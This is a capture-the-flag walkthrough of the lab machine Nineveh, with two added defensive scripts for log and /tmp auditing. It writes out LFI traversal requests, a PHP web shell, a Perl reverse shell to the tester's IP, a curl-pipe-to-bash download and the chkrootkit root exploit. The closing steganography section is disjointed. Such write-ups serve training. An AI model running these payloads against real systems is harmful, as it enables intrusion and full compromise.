Vulnerability Explanation: The machine is vulnerable to LFI on port 80 and is configured with a weak password policy. On port 443, it is vulnerable to code execution via phpLiteAdmin. Chaining the LFI with the phpLiteAdmin code injection lets us execute our reverse shell and gain an initial shell on the machine.
Privilege Escalation Vulnerability: outdated chkrootkit version
Vulnerability Fix: Enforce strong passwords for all users, validate user input, and apply patches to the system.
Severity: Critical
Steps to Compromise the Host:
Reconnaissance
└─$ nmap -sC -sV -T4 -p- 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 04:17 EDT
Nmap scan report for 10.10.10.43
Host is up (0.048s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Enumeration
Port 80 Apache/2.4.18
Browsing the webpage on port 80 reveals nothing, not even in the source code.
The nmap script output revealed the hostname nineveh.htb. Let's add it to /etc/hosts.
Browsing by hostname, we still get the same page.
Let's run gobuster to find any hidden directories. We found one: /department.
The /department directory leads us to a login page. The first things to try on a login page are default credentials and SQL injection, but neither works here.
From the source code, we can guess that the usernames are admin and amrois. The login page also allows us to enumerate usernames.
With username admin and a random password, the error message is "Invalid Password"; with username amrois, it is "Invalid Username". This confirms that admin is a valid username.
Let's start the intercepting proxy in Burp to check which parameters are required when we submit the login.
Brute Force web
Let's use hydra to brute-force the login with username admin.
We can log into phpLiteAdmin now. phpLiteAdmin is a PHP tool for interacting with SQLite databases, similar to phpMyAdmin for MySQL.
SQLite stores its database as a plain file and keeps inserted text verbatim, so if we insert PHP code into a table and rename the database with a .php extension, the web server will execute it.
Then, /secure-notes just displays an image; it seems like something we need to check.
Exploitation
Port 80 (LFI)
In the URL we see a file path parameter, so the first thing to test is LFI.
# Request
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt
# Response
. Have you fixed the login page yet! hardcoded username and password is really bad idea!
. check your serect folder to get in! figure it out! this is your challenge
. Improve the db interface.
~amrois
# Request
http://10.10.10.43/department/manage.php?notes=files/../../../etc/passwd
http://10.10.10.43/department/manage.php?notes=../../../etc/passwd
http://10.10.10.43/department/manage.php?notes=ninevehNotes../../../etc/passwd
# Response
No Note is selected.
include() is the PHP function used here: if the included file contains any PHP code, it is executed regardless of the file's extension.
# Request
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes/../../etc/passwd
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../etc/passwd
# Response
Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31
Warning: include(): Failed opening 'files/ninevehNotes' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31
From the above results, if the path does not contain /ninevehNotes, the page returns "No Note is selected"; the check is only a substring match, so the traversal still works once that string is present.
Now it's working. Normally an LFI vulnerability needs another vulnerability (a way to place a file on the server) in order to get remote code execution.
Port 443 (Code Execution)
Searching for public exploits for phpLiteAdmin shows that it is vulnerable to PHP remote code injection.
# phpLiteAdmin 1.9.3 - Remote PHP Code Injection
Description:
phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',
An attacker can create a SQLite database with a php extension and insert PHP code as text fields. When done, the attacker can execute it simply by accessing the database file with the web browser.
PHPLiteAdmin RCE
First, create a new table with the name testing and number of fields 1.
Inject the PHP code into the field, change the type to text and hit create.
<?php system($_REQUEST['cmd']); ?>
Then rename the database with a .php extension; the interface shows the path we can use to execute it.
Let's go back to our LFI and include that file path. We get an error message:
# Request
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../var/tmp/code.php&cmd=ls
# Response
Parse error: syntax error, unexpected 'cmd' (T_STRING), expecting ']' in /var/tmp/code.php on line 2
Let's change the code to <?php system($_REQUEST["cmd"]); ?> and now it executes.
Now let's send this request to Burp and start our netcat listener on port 4444.
nc -lvp 4444
Let's grab a reverse shell from pentestmonkey.
# Before encoding
cmd=perl -e 'use Socket;$i="10.10.14.31";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# Request for reverse shell
GET /department/manage.php?notes=/ninevehNotes/../../../var/tmp/code.php&cmd=perl+-e+'use+Socket%3b$i%3d"10.10.14.31"%3b$p%3d4444%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/bash+-i")%3b}%3b' HTTP/1.1
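The two request patterns above (traversal through the notes= parameter past the ninevehNotes substring check, and a cmd= parameter delivered alongside an include of a .php file under /var/tmp) are easy to spot in the web server's access log. The following detector is an added example, not part of the original writeup; the log lines are constructed to mirror the requests shown above, and the finding names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache access log lines (not from the original page) mirroring
# the manage.php requests discussed above: a benign note, the traversal that
# passes the ninevehNotes check, the cmd= delivery, and an unrelated request.
SAMPLE_LOG = """\
10.10.14.31 - - [04/Nov/2021:04:20:01 -0400] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512
10.10.14.31 - - [04/Nov/2021:04:21:13 -0400] "GET /department/manage.php?notes=files/ninevehNotes/../../etc/passwd HTTP/1.1" 200 2048
10.10.14.31 - - [04/Nov/2021:04:22:40 -0400] "GET /department/manage.php?notes=/ninevehNotes/../../../var/tmp/code.php&cmd=ls HTTP/1.1" 200 311
10.10.14.31 - - [04/Nov/2021:04:23:05 -0400] "GET /department/login.php HTTP/1.1" 200 1203
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def analyse_request(target):
    """Return the list of findings for one request target (path + query)."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get("notes", []):
        # parse_qs already decoded once; decode again so a double-encoded
        # "%252e%252e/" is still seen as "../".
        decoded = unquote_plus(value)
        # "../" anywhere in the include path, or an absolute path, is a
        # traversal attempt; the substring check on the page does not stop it.
        if "../" in decoded or decoded.startswith("/"):
            findings.append("lfi_traversal")
        # Including a .php file from a world-writable temp directory is the
        # LFI-to-RCE step described above.
        if decoded.endswith(".php") and "/tmp/" in decoded:
            findings.append("include_of_tmp_php")
    if "cmd" in query:
        findings.append("cmd_parameter")
    return findings


def scan_log(text):
    """Return [(line_no, findings)] for every log line with at least one finding."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        f = analyse_request(m.group("target"))
        if f:
            hits.append((no, f))
    return hits
```

Running scan_log over a real access log gives the same (line number, findings) pairs, which is enough to raise an alert on the first traversal attempt rather than after the shell lands.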
Privilege Escalation
Let's transfer lineum.sh to the victim machine to enumerate it. First, serve the file from our machine:
python3 -m http.server 80
On the victim machine, we can fetch and execute the file.
curl 10.10.14.31/lineum.sh | bash
We can see that port 22 is open on the machine, but our nmap scan didn't detect it.
Let's transfer pspy32 to the victim machine to enumerate the running processes.
wget 10.10.14.13/pspy32
chmod +x pspy32
./pspy32
chkrootkit (Priv-Esc)
We notice that chkrootkit runs at a regular interval (about every minute).
Alternatively, we can run the process-monitoring script from the IppSec video:
#!/bin/bash
# Split on newlines only, so each process command line stays one item
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    # Print only the processes that appeared or disappeared since the last sample
    diff <(echo "$old_process") <(echo "$new_process")
    sleep 1
    old_process=$new_process
done
Searching public exploits shows that this version is vulnerable to local privilege escalation.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
Go to /tmp and create a file named update containing a bash reverse shell.
Let's start our netcat listener on port 5555 and wait about 1 minute; our shell pops up as the root user.
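The advisory quoted above names two preconditions: /tmp mounted without noexec, and a non-root-owned executable called update in /tmp. The audit below checks both and is an added example, not part of the original writeup or of chkrootkit; the /proc/mounts content is constructed and the function names are my own.

```python
import os
import stat

# Constructed /proc/mounts content (not from the original page): a root
# filesystem plus a tmpfs on /tmp mounted without noexec, which is exactly
# the precondition the chkrootkit advisory describes.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
"""


def mount_options_for(path, mounts_text):
    """Return the option set of the mount that covers `path` (longest prefix wins)."""
    best, best_opts = "", set()
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mpoint, opts = fields[1], set(fields[3].split(","))
        covers = path == mpoint or path.startswith(mpoint.rstrip("/") + "/")
        if covers and len(mpoint) > len(best):
            best, best_opts = mpoint, opts
    return best_opts


def tmp_allows_exec(mounts_text):
    """True when /tmp is not mounted noexec, i.e. a file dropped there can run."""
    return "noexec" not in mount_options_for("/tmp", mounts_text)


def suspicious_update_files(entries):
    """entries: [(name, uid, mode)] for a /tmp listing. Flag an executable
    'update' that is not owned by root, the file the advisory warns about."""
    return [name for name, uid, mode in entries
            if name == "update" and uid != 0 and mode & stat.S_IXUSR]


def audit_tmp(tmp_dir="/tmp"):
    """Live check on the host: list tmp_dir and apply suspicious_update_files."""
    entries = []
    for name in os.listdir(tmp_dir):
        st = os.lstat(os.path.join(tmp_dir, name))
        entries.append((name, st.st_uid, st.st_mode))
    return suspicious_update_files(entries)


if __name__ == "__main__":
    with open("/proc/mounts") as fh:
        print("/tmp exec allowed:", tmp_allows_exec(fh.read()))
    print("suspicious /tmp/update:", audit_tmp())
```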
Extra Content
Steganography (Image)
Remember, we found an image in /secure-notes. Let's download the image file and check it. The file type is just a simple PNG image.
└─$ for i in 571 290 911; do nmap -Pn --max-retries 0 -p $i 10.10.10.43 && sleep 1; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Let's check port 22 again; we find it is open now.
└─$ nmap -p22 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Nmap scan report for 10.10.10.43
Host is up (0.043s latency).
PORT STATE SERVICE
22/tcp open ssh
Now we can SSH to the server as user amrois.
function in PHP used for comparing two strings.
Another method we use is searching binary images for embedded files and executable code. We can see a hidden tar archive file.